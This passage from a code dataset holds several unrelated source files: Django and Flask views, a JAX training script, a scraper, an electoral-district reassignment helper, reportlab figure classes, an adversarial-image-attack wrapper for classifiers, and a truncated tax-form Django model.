collection, \"item\": saved_item.id}))\n #Utwórz listę elementów listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + Collections.objects.get(pk=collection).name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item_form\": item_form,\n \"values_form\": values_form,\n })\n\n def dispatch(self, *args, **kwargs):\n return super(Item_Edit, self).dispatch(*args, **kwargs)\n\n\nclass Item_Delete(View):\n \"\"\"\n @PODSUMOWANIE: Widok potwierdzenia usunięcia pojedynczego elementu oraz obsługa kasacji.\n @DANE: collection - numer id kolekcji\n item - numer id elementu, niewymagany\n \"\"\"\n view_template = \"item_delete.html\"\n TITLE = u\"Skasuj element kolekcji: \"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n\n def get(self, request, collection, item, *args, **kwargs):\n # Dodatkowe przyciski\n additional_buttons = [RL(url=\"collection_edit\",\n title=\"Edytuj kolekcję\",\n collection=collection),\n RL(url=\"collection_delete\",\n title=\"Skasuj kolekcję\",\n collection=collection),\n RL(url=\"item_new\",\n title=\"Dodaj nowy element kolekcji\",\n collection=collection)]\n # Zamień numer id kolekcji na obiekt\n collection = Collections.objects.get(pk=collection)\n #Utwórz listę elementów kolekcji do listy prawego menu\n scroll_menu = [item_obj.make_link() for item_obj in Items.objects.filter(collection=collection)]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE + collection.name,\n \"buttons\": self.buttons + additional_buttons,\n \"scroll_menu\": scroll_menu,\n \"item\": Items.objects.get(pk=item),\n \"collection\": collection\n })\n\n def post(self, request, collection, item=None, *args, **kwargs):\n # Jeśli użytkownik potwierdził, usuń element kolekcji. Przypisane wartości kasują się automatycznie\n if request.POST.get(\"submit\", False) == \"Tak\":\n Items.objects.get(pk=item).delete()\n return redirect(reverse(\"collection_view\",\n kwargs={\"collection\": collection}))\n # Jeśli nie, odeślij do widoku tego elementu\n return redirect(reverse(\"item_view\",\n kwargs={\"collection\": collection,\n \"item\": item}))\n\n def dispatch(self, *args, **kwargs):\n return super(Item_Delete, self).dispatch(*args, **kwargs)\n\n\nclass Helper_Lists(View):\n \"\"\"\n @PODSUMOWANIE: Widok dodawania i edycji List Wartości Pomocniczych.\n @DANE: supp_list_id - numer id listy pomocniczej\n \"\"\"\n # TODO: filtorwanie list po ich kolekcjach\n # TODO: każda lista może mieć puste pole\n TITLE = u\"Listy pomocnicze\"\n SUBTITLE = u\"Wybierz listę pomocniczą do edycji z prawej strony lub utwórz nową poniżej.\"\n view_template = \"list_menu.html\"\n buttons = [Buttons.COLLECTION_SELECT, Buttons.LIST_MENU]\n VALUES_FORMSET = modelformset_factory(Support_Values,\n fields=[\"value\", \"support_table\"],\n widgets={\"support_table\": HiddenInput()},\n can_delete=True,\n extra=0,\n )\n class INFO():\n FAIL = \"Lista nie została zapisana.\"\n SUCCESS = \"Zmiany zostały poprawnie zapisane.\"\n SUCCESS_NEW = \"Lista została zapisana. 
Teraz można dodać elementy.\"\n\n def get(self, request, supp_list_id='', *args, **kwargs):\n if supp_list_id: # Jeśli numer podany, to edycja istniejącej listy\n # Wyciągnij obiekt z bazy danych\n support_table = Support_Tables.objects.get(pk=supp_list_id)\n # Zainicjuj formularz z podanego obiektu\n name_form = New_List_Form(instance=support_table)\n # Wypełnij zestaw wstępnymi danymi\n formset = self.VALUES_FORMSET(queryset=Support_Values.objects.filter(support_table=support_table))\n else: # Jeśli nie, to tworzenie nowej Listy Pomocniczej\n name_form = New_List_Form()\n formset = []\n #Utwórz listę elementów listy prawego menu z istniejących List Wartości\n scroll_menu = [item.make_link() for item in Support_Tables.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"new_list\": Buttons.LIST_NEW,\n \"name_form\": name_form,\n \"formset\": formset,\n \"supp_list_id\": supp_list_id,\n \"message\": self.SUBTITLE\n })\n\n def post(self, request, supp_list_id='', *args, **kwargs):\n message = ''\n if supp_list_id == '': # Nowa Lista Pomocnicza:\n # Utwórz formularz z danych przychodzących\n name_form = New_List_Form(data=request.POST)\n # Waliduj\n if name_form.is_valid():\n # Zapisz i utwórz stosowną informację\n support_table = name_form.save()\n message = self.INFO.SUCCESS_NEW\n else:\n message = self.INFO.FAIL\n # Wypełnij zestaw formularzy danymi wstępnymi\n formset = self.VALUES_FORMSET(queryset=Support_Values.objects.filter(support_table=support_table),\n initial=[{\"value\": item.value} for item in Support_Values.objects.filter(support_table=support_table)])\n supp_list_id = support_table.id\n else: # Edycja\n # Wyciągnij istniejącą Listę z bazy\n support_table = Support_Tables.objects.get(pk=supp_list_id)\n # Zainicjuj formularz tej listy\n name_form = New_List_Form(data=request.POST, instance=support_table)\n # Utwórz surowy formularz wartości listy\n formset = self.VALUES_FORMSET(request.POST,\n initial=[{\"support_table\": support_table} for _ in range(int(request.POST[\"form-TOTAL_FORMS\"]))],\n queryset=Support_Values.objects.filter(support_table=support_table)\n )\n # Waliduj obydwa i zapisz\n if name_form.is_valid() and formset.is_valid():\n name_form.save()\n formset.save()\n message = self.INFO.SUCCESS\n formset = self.VALUES_FORMSET(queryset=Support_Values.objects.filter(support_table=support_table),\n initial=[{\"value\": item.value} for item in Support_Values.objects.filter(support_table=support_table)])\n else:\n message = self.INFO.FAIL\n #Utwórz listę elementów listy prawego menu z istniejących List Wartości\n scroll_menu = [item.make_link() for item in Support_Tables.objects.all()]\n\n return render(request,\n self.view_template,\n {\"title\": self.TITLE,\n \"buttons\": self.buttons,\n \"scroll_menu\": scroll_menu,\n \"new_list\": Buttons.LIST_NEW,\n \"message\": message,\n \"name_form\": name_form,\n \"formset\": formset,\n \"supp_list_id\": supp_list_id\n })\n\n\n def dispatch(self, *args, **kwargs):\n return super(Helper_Lists, self).dispatch(*args, **kwargs)\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"11886505","text":"from app.api import bp\nfrom flask import request, jsonify\nfrom app.models import Entry, cdict\nfrom flask_jwt_extended import jwt_required\n\n@bp.route('/entries', 
methods=['PUT'])\n@jwt_required\ndef edit_entry():\n\tj = request.json.get\n\tid = j('id')\n\tbody = j('body')\n\tverses = j('verses')\n\tname = j('name')\n\tEntry.edit(id, verses, name, body)\n\treturn jsonify({'yes': True})\n\n@bp.route('/entries', methods=['DELETE'])\n@jwt_required\ndef delete_entry():\n\tid = request.args.get('id')\n\tEntry.query.get(id).delete()\n\treturn jsonify({'yes': True})\n\n@bp.route('/entries/from_subtopic', methods=['GET'])\ndef get_entries_from_subtopic():\n\ta = request.args.get\n\tid = a('id')\n\tpage = a('page')\n\treturn jsonify(cdict(Entry.query.filter_by(subtopic_id=id), page))\n\n@bp.route('/entries', methods=['POST'])\n@jwt_required\ndef add_entry():\n\terrors = []\n\tj = request.json.get\n\tid = j('id')\n\tverses = j('verses')\n\tname = j('name')\n\tif Entry.query.filter_by(name=name).first():\n\t\terrors.append('Entry with that name already exists')\n\t\treturn jsonify({'errors': errors})\n\tbody = j('body')\n\tentry = Entry(verses, name, body, id)\n\treturn jsonify(entry.dict())\n\n@bp.route('/entries', methods=['GET'])\ndef get_entry():\n\tid = request.args.get('id')\n\treturn jsonify(Entry.query.get(id).dict())","sub_path":"app/api/entries.py","file_name":"entries.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"375822793","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 10 07:36:39 2021\n\n@author: arnovel\n\"\"\"\nimport os\nimport pickle\nimport pandas as pd\nimport jax.numpy as jnp\nimport matplotlib.pyplot as plt\nimport haiku as hk\nimport jax\nimport optax\n\nfrom tqdm import tqdm\nfrom jax import grad, jit\nfrom jax.interpreters.xla import _DeviceArray\nfrom typing import TypeVar, Any, Tuple\n\n# types\n\nOptState = Any\narray = TypeVar(\"array\", bound=_DeviceArray)\n\n\n# init\n_seed = 101\nrng = jax.random.PRNGKey(_seed)\n## number of Gradient Descent updates\nmax_iters = int(5e02)\n## Gradient Descent Step Size\nstep_size = 1e-03\n_lambda, _mu = 100.0, 100.0\n## data path\ncurr_path = os.path.dirname(__file__)\ndata_path = os.path.join(curr_path, f\"data_seed_{_seed}.pkl\")\nparams_path = os.path.join(curr_path, f\"params_seed_{_seed}.pkl\")\n\n# funcs\n\ndef two_layers_net(width: int = 30,\n output_dim: int = 1\n ) -> hk.Module:\n '''\n A basic two layer network with ReLU activations\n '''\n network = hk.Sequential([\n hk.Linear(width), jax.nn.relu,\n hk.Linear(width), jax.nn.relu,\n hk.Linear(output_dim)\n ])\n \n return network\n\ndef net_evaluate(X: array,\n Y: array,\n width: int = 30,\n ) -> Tuple[array]:\n '''\n Evaluates the two networkx on data `X`, `Y`.\n '''\n output_dim = Y.shape[1]\n net_frwd = two_layers_net(width, output_dim)\n net_bkwd = two_layers_net(width, output_dim)\n \n Y_hat = net_frwd(X)\n X_hat = net_bkwd(Y)\n inv_X = net_bkwd(Y_hat)\n inv_Y = net_frwd(X_hat)\n \n return X_hat, Y_hat, inv_X, inv_Y\n \n\nif __name__ == '__main__':\n # load data\n data = pd.read_pickle(data_path)\n X = data['x'].values.reshape(-1,1)\n Y = data['y'].values.reshape(-1,1)\n # init net & opt\n net = hk.without_apply_rng(hk.transform(net_evaluate))\n opt = optax.adam(step_size)\n params = net.init(rng, X, Y)\n opt_state = opt.init(params)\n \n # define runtime routines\n \n def loss(params: hk.Params,\n X: array,\n Y: array,\n _lambda: float,\n _mu: float,\n ) -> array:\n \n X_hat, Y_hat, inv_X, inv_Y = net.apply(params, X,Y)\n \n avg_x_fit_sq_err = jnp.mean( (X_hat - X) ** 2 )\n avg_y_fit_sq_err = 
jnp.mean( (Y_hat - Y) ** 2 )\n        avg_x_invfit_sq_err = jnp.mean( (inv_X - X) ** 2 )\n        avg_y_invfit_sq_err = jnp.mean( (inv_Y - Y) ** 2 )\n        \n        _fit = avg_x_fit_sq_err + avg_y_fit_sq_err\n        _inv_constraint = _lambda * avg_x_invfit_sq_err + _mu * avg_y_invfit_sq_err\n        \n        _loss = _fit + _inv_constraint\n        \n        return _loss\n    \n    @jit\n    def update(params: hk.Params,\n               opt_state: OptState,\n               X: array,\n               Y: array,\n               ) -> Tuple[hk.Params, OptState]:\n        \n        grads = grad(loss)(params, X, Y, _lambda, _mu)\n        updates, opt_state = opt.update(grads, opt_state)\n        new_params = optax.apply_updates(params, updates)\n        return new_params, opt_state\n    \n    hist_train = []\n    # train for `max_iters` epochs\n    for step in tqdm(range(max_iters)):\n        _loss = loss(params, X, Y, _lambda, _mu)\n        hist_train.append(_loss)\n        params, opt_state = update(params, opt_state, X, Y)\n    \n    \n    # plot train error as func(iter)\n    plt.plot(hist_train)\n    plt.show()\n    \n    # store params\n    with open(params_path, mode='wb') as fp:\n        pickle.dump(obj=params, file=fp)\n    ","sub_path":"train_sample_constraint.py","file_name":"train_sample_constraint.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"412220589","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ncutoff_energy = np.genfromtxt('cutoff_energy.csv', delimiter=',')\ntotal_energy = np.genfromtxt('total_energy.csv', delimiter=',')\n\nN = len(total_energy)\nenergy_diff = np.zeros(N)\nmax_index = np.argmax(cutoff_energy)\n\nfor k in range(N):\n\tenergy_diff[k] = np.abs(total_energy[k] - total_energy[max_index])\n\n# np.delete returns a new array rather than deleting in place, so the result must be assigned\nenergy_diff = np.delete(energy_diff, max_index)\ncutoff_energy = np.delete(cutoff_energy, max_index)\n\nplt.plot(cutoff_energy, np.log10(energy_diff), 'ko')\nplt.plot(cutoff_energy, np.log10(0.00185*np.ones_like(energy_diff)))#Accounts for fact that there are 5 atoms\nplt.xlabel('Cutoff energy (Ry)')\nplt.ylabel('log(Energy difference) (Ry)')\nplt.show()\n","sub_path":"convergence/ecutwfc/cutoff_plotter.py","file_name":"cutoff_plotter.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"434782278","text":"''' scrape_html3 - Complete example'''\n\n# third-party libraries\nimport requests\nfrom bs4 import BeautifulSoup\nimport custom\n\nURL = 'http://graduate.kennesaw.edu/datascience/students.php'\n\n# retrieve web page and parse\nresponse = requests.get(URL)\nsoup = BeautifulSoup(response.content, 'lxml')\n\n# find the relevant blocks of HTML\ninfo_blocks = soup.findAll('div', {'class':'more_info'})\n\n# then descend and extract\nfor info in info_blocks:\n    title_div = info.find_previous_sibling('div')\n    title = title_div.span.text.strip()\n    print(title)\n    \n    for li in info.ul.findAll('li'):\n        print(li.text.strip())\n    print()\n","sub_path":"scrape_html3.py","file_name":"scrape_html3.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"320944505","text":"# pylint: disable=missing-docstring\nimport functools\n\nfrom src.database.db_handler import db_session\nfrom src.database.db_helper import get_results_from_table, get_county_geojson\nfrom src.database.models import Diff, MergedDistrictDiff, MergedDistrict\n\n\ndef gerrymander(party, bwk, new_county, old_county, original_size, diffs, county_result, results):\n    steps = []\n\n    # We try to expand our new county to a reasonable size...\n    counter = 1\n    while new_county and counter <
original_size:\n new_new_county = []\n for district in new_county:\n if not district.neighbours:\n district.fill_neighbours()\n # ...by searching the neighbours of our glorious new county\n own_diff, own_bwk = get_bwk_and_diff(district, diffs)\n d_neighbours = get_neighbours(district, diffs,\n lambda n_district, n_bwk:\n any(b_d.identifier == n_district.identifier for b_d in old_county)\n or own_bwk != n_bwk)\n for neighbour, neighbour_diff, neighbour_bwk in d_neighbours:\n # Calculate the new result\n new_county_result = get_new_results(neighbour, county_result)\n new_neighbour_county_result = get_new_results(neighbour, results[neighbour_bwk], factor=-1)\n neighbour_county_winner = get_winning_party(results[neighbour_bwk])\n\n # Check if still win with this new district and that the old county's result is not changed\n if check_winning_party(new_county_result, party) and \\\n (neighbour_bwk == bwk or\n check_winning_party(new_neighbour_county_result, neighbour_county_winner)):\n counter += 1\n add_district_to_bwk(neighbour, bwk, diffs, neighbour_diff)\n steps.append({'action': 'grow', 'targets': get_county_geojson({neighbour_bwk, bwk})})\n new_new_county.append(neighbour)\n county_result = new_county_result\n if neighbour_bwk != bwk:\n results[neighbour_bwk] = new_neighbour_county_result\n\n oc_district = next((x for x in old_county if x.identifier == neighbour.identifier), None)\n if oc_district:\n old_county.remove(oc_district)\n\n new_county = new_new_county\n\n forced = False\n\n # Check if we still have districts we have to move around\n while old_county:\n changed = False\n for district in old_county:\n\n if district.neighbours is None:\n district.fill_neighbours()\n\n # Check if we got a diff for the current district to check our districts current BWK\n own_diff, own_bwk = get_bwk_and_diff(district, diffs)\n\n # Search for neighbours who are in a different BWK\n d_neighbours = get_neighbours(district, diffs, lambda _, n_bwk: own_bwk != n_bwk)\n\n for neighbour, neighbour_diff, neighbour_bwk in d_neighbours:\n # Try to make sure that the result in the neighbours BWK is unchanged when we add this district\n old_winner = sorted(results[neighbour_bwk], key=lambda x: x[1], reverse=True)[0][0]\n n_results = neighbour.get_result_dict()\n # Add the votes of this district to the total result of the bwk\n for key in n_results.keys():\n results[neighbour_bwk][key] += n_results[key]\n # If the result in the BWK is unchanged\n if forced or sorted(results[neighbour_bwk], key=lambda x: x[1], reverse=True)[0][0] == old_winner:\n add_district_to_bwk(district, neighbour_bwk, diffs, own_diff)\n old_county.remove(district)\n steps.append({'action': 'cleanup', 'targets': get_county_geojson({neighbour_bwk, bwk})})\n changed = True\n forced = False\n\n break\n else:\n for key in n_results.keys():\n results[neighbour.bwk][key] -= n_results[key]\n # If we didn't find the perfect candidate just force the addition to the\n # first potential BWK and try again\n if not changed:\n forced = True\n\n return steps\n\n\ndef get_gerrymandering_steps(bwk, party):\n # Yay for local functions!\n # Sort bwk districts by their results\n def district_comparator(d1, d2):\n d1_party_result = d1.get_result_dict()[party]\n d2_party_result = d2.get_result_dict()[party]\n sorted_d1_tuples = sorted(d1.get_result_dict().items(), key=lambda d: d[1], reverse=True)\n sorted_d2_tuples = sorted(d2.get_result_dict().items(), key=lambda d: d[1], reverse=True)\n d1_to_first = sorted_d1_tuples[0][1] - d1_party_result\n d1_to_second = 
sorted_d1_tuples[1][1] - d1_party_result\n d2_to_first = sorted_d2_tuples[0][1] - d2_party_result\n d2_to_second = sorted_d2_tuples[1][1] - d2_party_result\n\n if d1_to_first > d2_to_first:\n return 1\n elif d1_to_first < d2_to_first:\n return -1\n else: # When the party we look at has the most votes\n # Look at the distance to the second place\n if d1_to_second > d2_to_second:\n return 1\n elif d1_to_second < d2_to_second:\n return -1\n else: # If this should be miraculously the same check for the largest value\n if d1_party_result > d2_party_result:\n return -1\n elif d1_party_result < d2_party_result:\n return 1\n else:\n return 0\n\n steps = []\n districts = MergedDistrictDiff.query.all()\n original_bwk_districts = MergedDistrict.query.filter(MergedDistrict.bwk == bwk).all()\n diffs = Diff.query.all()\n results = get_results_from_table(MergedDistrictDiff)\n old_county = [district for district in districts if district.bwk == bwk]\n county_result = {key: 0 for key in districts[0].get_result_dict().keys()}\n if old_county:\n # Sort by highest delta\n old_county = sorted(old_county, key=functools.cmp_to_key(district_comparator))\n append_search_step(old_county, steps)\n new_county_result = get_new_results(old_county[0], county_result)\n if check_winning_party(new_county_result, party):\n steps[len(steps) - 1]['winner'] = old_county[0].identifier\n return steps + gerrymander(party, bwk, [old_county[0]], old_county[1:], len(original_bwk_districts), diffs,\n new_county_result, results)\n\n # If we found no working solution\n # check if we find a good seed in the original district\n original_bwk_districts = sorted(original_bwk_districts, key=functools.cmp_to_key(district_comparator))\n append_search_step(original_bwk_districts, steps)\n new_county_result = get_new_results(original_bwk_districts[0], county_result)\n if check_winning_party(new_county_result, party):\n original_district_bwk = get_bwk_and_diff(original_bwk_districts[0], diffs)[1]\n results[original_district_bwk] = get_new_results(districts[0], results[original_district_bwk],\n factor=-1)\n add_district_to_bwk(original_bwk_districts[0], bwk, diffs)\n steps[len(steps) - 1]['winner'] = original_bwk_districts[0].identifier\n return steps + gerrymander(party, bwk, [original_bwk_districts[0]], old_county, len(original_bwk_districts),\n diffs, new_county_result, results)\n\n # If this does not work either check if we find any district anywhere\n # By checking the neighbours of the original district and then branching outward\n alreadychecked = set([district.identifier for district in original_bwk_districts])\n check_for_neighbours = original_bwk_districts\n while check_for_neighbours:\n districts_to_check = []\n for district in check_for_neighbours:\n districts_to_check += get_neighbours(district, diffs,\n lambda neighbour, _:\n neighbour not in districts_to_check\n and neighbour.identifier not in alreadychecked)\n\n append_search_step(districts, steps)\n for district, _, district_bwk in districts_to_check:\n new_county_result = get_new_results(district, county_result)\n if check_winning_party(new_county_result, party):\n results[district_bwk] = get_new_results(district, results[district_bwk], factor=-1)\n add_district_to_bwk(district, bwk, diffs)\n steps[len(steps) - 1]['winner'] = district.identifier\n return steps + gerrymander(party, bwk, [district], old_county, len(original_bwk_districts), diffs,\n new_county_result, results)\n\n check_for_neighbours = districts_to_check\n\n # If we haven't found any suitable candidate return\n # 
the search steps we have taken\n return steps\n\n\ndef append_search_step(candidates, steps):\n steps.append({'action': 'search', 'candidates': [district.identifier for district in candidates]})\n\n\ndef check_winning_party(voting_results, party):\n if any(value > 0 for value in voting_results.values()):\n return get_winning_party(voting_results) == party\n else:\n return False\n\n\ndef get_winning_party(voting_results):\n return sorted(voting_results.items(), key=lambda x: x[1], reverse=True)[0][0]\n\n\ndef get_new_results(district, sums, factor=1):\n nc_results = district.get_result_dict()\n new_sums = sums.copy()\n for key in sums.keys():\n new_sums[key] += nc_results[key] * factor\n return new_sums\n\n\ndef get_neighbours(district, diffs, filter_function):\n # Get all neighbours that are not in the current districts BWK\n d_neighbours = []\n if not district.neighbours:\n district.fill_neighbours()\n\n for n in district.neighbours:\n n_diff, n_bwk = get_bwk_and_diff(n, diffs)\n if filter_function(n, n_bwk):\n d_neighbours.append((n, n_diff, n_bwk))\n return d_neighbours\n\n\ndef add_district_to_bwk(target_district, target_bwk, diffs, district_diff=None):\n if not district_diff:\n district_diff = get_bwk_and_diff(target_district, diffs)[0]\n\n # Check if we got a diff already\n if district_diff:\n if target_bwk == target_district.bwk:\n diffs.remove(district_diff)\n db_session.delete(district_diff)\n else:\n district_diff.bwk = target_bwk\n\n # ... if not add one\n elif target_bwk != target_district.bwk:\n target_diff = Diff(target_district.identifier, target_bwk)\n db_session.add(target_diff)\n diffs.append(target_diff)\n\n db_session.commit()\n\n\n# Returns the districts diff entry and current BWK\ndef get_bwk_and_diff(district_to_check, diffs):\n loc_diff = next((x for x in diffs if x.identifier == district_to_check.identifier), None)\n\n if loc_diff:\n loc_bwk = loc_diff.bwk\n else:\n loc_bwk = district_to_check.bwk\n\n return loc_diff, loc_bwk\n\n\nif __name__ == '__main__':\n get_gerrymandering_steps('083', 'gruene')\n","sub_path":"src/database/gerrymandering_helper.py","file_name":"gerrymandering_helper.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"137714681","text":"# -*- coding: utf-8 -*-\n\n\nfrom globals import *\nfrom tools import translate_color, canvas_reset\n\n\n\nclass Figure:\n def __init__(self, _id, x, y):\n self.id = _id\n self.type = 'None'\n self.x = x * PT #posicion X\n self.y = y #posicion Y\n\n\n def is_rect(self):\n \"\"\"\n Si es un objecto rectangulo\n \"\"\"\n if self.type == 'Rect':\n return True\n else:\n return False\n\n\n def is_text(self):\n \"\"\"\n Si es un objecto Texto\n \"\"\"\n if self.type == 'Text':\n return True\n else:\n return False\n\n\n\nclass Rect(Figure):\n def __init__(self, _id, x, y, w, h, lw=LINEWEIGHT,c=COLOR, sc=STROKECOLOR, bg=BACKGROUNDCOLOR):\n \"\"\"\n en cuanto a posicion y tamaño se expecifica en pt\n \"\"\"\n Figure.__init__(self, _id, x, y)\n self.type = 'Rect'\n self.w = w * PT #normalizo el ancho\n self.h = h #alto\n self.lw = lw * PT #ancho de linea normalizado\n self.c = c #color\n self.sc = sc #stroke color\n self.bg = bg #color de fondo o relleno\n\n self.y = (HEIGHT * PX) - self.y - self.h\n self.y = self.y * PT\n self.h = self.h * PT\n\n\n def draw(self, canvas):\n canvas_reset(canvas)#reseteo colores\n #setcolors\n sc = translate_color(self.sc)\n canvas.setStrokeColorRGB(sc[R],sc[G], sc[B])\n #ancho linea\n if 
self.lw != 0:\n _stroke = 1\n canvas.setLineWidth(self.lw)\n else:\n _stroke = 0\n\n #draw\n if self.bg == \"none\":\n canvas.rect(self.x, self.y, self.w, self.h, stroke = _stroke)\n else:\n bg = translate_color(self.bg)\n canvas.setFillColorRGB(bg[R], bg[G], bg[B])\n canvas.rect(self.x, self.y, self.w, self.h, stroke = _stroke, fill=1)\n\n\n def __str__(self):\n return \"RECT(%s %s %s %s | %s %s %s)\" %(self.x, self.y, self.w, self.h, self.lw, self.sc, self.bg)\n\n\n\nclass Label(Figure):\n def __init__(self, _id, x, y, text=\"\", font=FONTFAMILY, size=12, index=False, c=COLOR, sc=STROKECOLOR, bg=BACKGROUNDCOLOR):\n \"\"\"\n en cuanto a posicion y tamaño se expecifica en pt\n \"\"\"\n Figure.__init__(self, _id, x, y)\n self.type = 'Text'\n self.font = font\n self.size = size #tamaño texto en pixel\n self.text = text #texto\n self.index = index #si se usara como indice de relleno no imprimira el texto\n self.c = c #color\n self.sc = sc #stroke color\n self.bg = bg #color de fondo o relleno\n\n self.y = (HEIGHT * PX) - self.y # - self.size\n self.y = self.y * PT\n self.size = self.size * PT\n\n def draw(self, canvas):\n #si es una etiqueta indice no se dibujara\n if not self.index:\n canvas_reset(canvas)#reseteo colores\n #setcolors\n sc = translate_color(self.sc)\n canvas.setStrokeColorRGB(sc[R],sc[G], sc[B])\n bg = translate_color(self.bg)\n canvas.setFillColorRGB(bg[R], bg[G], bg[B])\n #font configuration\n canvas.setFont(self.font, self.size)\n canvas.drawString(self.x, self.y, self.text)\n\n\n\n def __str__(self):\n return \"TEXT (%s %s %s %s)\" %(self.x, self.y, self.text, self.size)\n\n\n\nclass Line(Figure):\n pass\n\n\n\nclass Elipse(Figure):\n pass","sub_path":"backup/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"318262246","text":"import numpy as np\nfrom .PQP import PQP\n\ndef attack_classifier(forward, model, ori_label, data_generator, iter_time,hard_attack=True, loss_goal=0.9, N=20):\n query_fun = lambda img: forward(model, img)\n mean = lambda x: np.asarray(x).mean()\n success, ssim, psnr, NQ = [], [], [], []\n adv_images = np.copy(data_generator)\n num_imgs = data_generator.shape[0]\n for i in range(num_imgs):\n img = data_generator[i]\n label = ori_label[i]\n probs = forward(model, img)\n loss_goal_ = loss_goal\n preds = np.argsort(probs)\n if hard_attack:\n target = preds[0] # last predicted class\n print('*** Attacking image %d, original label %d, target label %d ***' % (i+1, label, target))\n print_every = iter_time *10\n else:\n target = preds[-2] # 2nd predicted class\n print('*** Attacking image %d, original label %d, target label %d ***' % (i+1, label, target))\n print_every = iter_time\n\n # start attack\n newImg, success_, ssim_, psnr_, NQ_, _ = PQP(int(ori_label[i]) ,query_fun=query_fun, or_img=img, target=target, loss_goal=loss_goal_, N=N,\n minimize_loss=False, print_every=print_every)\n newImg = np.uint8(newImg)\n adv_images[i] = newImg\n\n if(success_):\n success.append(1)\n else:\n success.append(0)\n ssim.append(ssim_)\n psnr.append(psnr_)\n NQ.append(NQ_)\n print('\\n***Ending**')\n print('*** Success %d/%d, average ssim: %0.3f'\n % (sum(success), num_imgs, mean(ssim)))\n return adv_images, ssim, 
success","sub_path":"backEnd/toolkit/attacks/SSIM_attack_back/PQP_attack.py","file_name":"PQP_attack.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"236540205","text":"from django.db import models\n\nclass model1040NREZ(models.Model):\n refnum = models.IntegerField(\"Reference Number\", default=0)\n\n F1040NREZL01 = models.BooleanField(\"Single nonresident alien\", default=False)\n F1040NREZL02 = models.BooleanField(\"Married nonresident alien\", default=False)\n F1040NREZL03 = models.IntegerField(\"Wages, salaries, tips, etc. Attach Form(s) W-2\", default=0)\n F1040NREZL04 = models.IntegerField(\"Taxable refunds, credits, or offsets of state and local income taxes\", default=0)\n F1040NREZL05 = models.IntegerField(\"Scholarship and fellowship grants. Attach Form(s) 1042-S or required statement\", default=0)\n F1040NREZL06 = models.IntegerField(\"Total income exempt by a treaty from page 2, Item J(1)(e)\", default=0)\n F1040NREZL07 = models.IntegerField(\"Add lines 3, 4, and 5\", default=0)\n F1040NREZL08 = models.IntegerField(\"Scholarship and fellowship grants excluded\", default=0)\n F1040NREZL09 = models.IntegerField(\"Student loan interest deduction\", default=0)\n F1040NREZL10 = models.IntegerField(\"Subtract the sum of line 8 and line 9 from line 7. This is your adjusted gross income\", default=0)\n F1040NREZL11 = models.IntegerField(\"Itemized deductions\", default=0)\n F1040NREZL12 = models.IntegerField(\"Subtract line 11 from line 10\", default=0)\n F1040NREZL13 = models.IntegerField(\"Exemption\", default=0)\n F1040NREZL14 = models.IntegerField(\"Taxable income. Subtract line 13 from line 12. If line 13 is more than line 12, enter -0-\", default=0)\n F1040NREZL15 = models.IntegerField(\"Tax. Find your tax in the Tax Table on pages 17 through 25\", default=0)\n F1040NREZL16 = models.IntegerField(\"Unreported social security and Medicare tax from Form:\", default=0)\n F1040NREZL16a = models.IntegerField(\"Form 4137\", default=0)\n F1040NREZL16b = models.IntegerField(\"Form 8919\", default=0)\n F1040NREZL17 = models.IntegerField(\"Add lines 15 and 16. This is your total tax\", default=0)\n F1040NREZL18a = models.IntegerField(\"Federal income tax withheld from Form(s) W-2 and 1099-R\", default=0)\n F1040NREZL18b = models.IntegerField(\"Federal income tax withheld from Form(s) 1042-S\", default=0)\n F1040NREZL19 = models.IntegerField(\"2013 estimated tax payments and amount applied from 2012 return\", default=0)\n F1040NREZL20 = models.IntegerField(\"Credit for amount paid with Form 1040-C\", default=0)\n F1040NREZL21 = models.IntegerField(\"Add lines 18a through 20. These are your total payments\", default=0)\n F1040NREZL22 = models.IntegerField(\"If line 21 is more than line 17, subtract line 17 from line 21. 
This is the amount you overpaid\", default=0)\n F1040NREZL23a = models.IntegerField(\"Amount of line 22 you want refunded to you.\", default=0)\n F1040NREZL23b = models.IntegerField(\"Routing number\", default=0)\n F1040NREZL23c = models.IntegerField(\"Checking or Savings\", default=0)\n F1040NREZL23d = models.IntegerField(\"Account number\", default=0)\n F1040NREZL23e = models.IntegerField(\"If you want your refund check mailed to an address outside the United States not shown above, enter that address here:\", default=0)\n F1040NREZL24 = models.IntegerField(\"Amount of line 22 you want applied to your 2014 estimated tax\", default=0)\n F1040NREZL25 = models.IntegerField(\"Amount you owe. Subtract line 21 from line 17. For details on how to pay, see instructions\", default=0)\n F1040NREZL26 = models.IntegerField(\"Estimated tax penalty (see instructions)\", default=0)\n \n # label not required here, since the modelPostTaxInput already has it, which gets passed to postTaxInputForm\n # null=True is for database, blank=True is for form validation\n # since boolean does not accept null, use default=False \n F1040NREZSCHOILA = models.CharField(max_length=128)\n F1040NREZSCHOILB = models.CharField(max_length=128)\n F1040NREZSCHOILC = 